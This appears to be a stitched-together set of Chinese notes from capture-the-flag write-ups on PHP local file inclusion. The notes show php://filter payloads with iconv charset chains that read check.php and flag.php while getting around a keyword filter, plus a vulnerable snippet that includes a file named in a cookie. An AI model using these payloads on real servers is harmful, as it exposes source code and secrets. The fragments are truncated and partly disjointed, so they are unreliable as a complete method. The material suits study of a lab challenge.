filename=php://filter/read=convert.iconv.utf-8/iso-8859-1/resource=./check.php (3)看了 writeup ,确实是 PHP 伪协议,只不过写法有点不一样,过滤器类型:未明确指定,默认为 read,下面这种写法实际上使用的是 iconv 扩展中的 //TRANSLIT 或 //IGNORE 模式来处理字符集转换
phpif(!ini_get('display_errors')){ini_set('display_errors','On');}error_reporting(E_ALL);$lan=$_COOKIE['language'];if(!$lan){@setcookie("language","english");@include("english.php");}else{@include($lan.".php");}$x=file_get_contents('index.php');echo$x;?> 文件包含,利用PH...
filename=php://filter/convert.iconv.UTF-8*.UCS-4LE*/resource=check.php 可以看到check.php过滤的内容,/base|be|encode|print|zlib|quoted|write|rot13|read|string/i,不过已经不重要的 该题目没有提示flag文件的位置,尝试包含常见的flag.php shell ?filename=php://filter/convert.iconv.UTF-8*.UTF-16...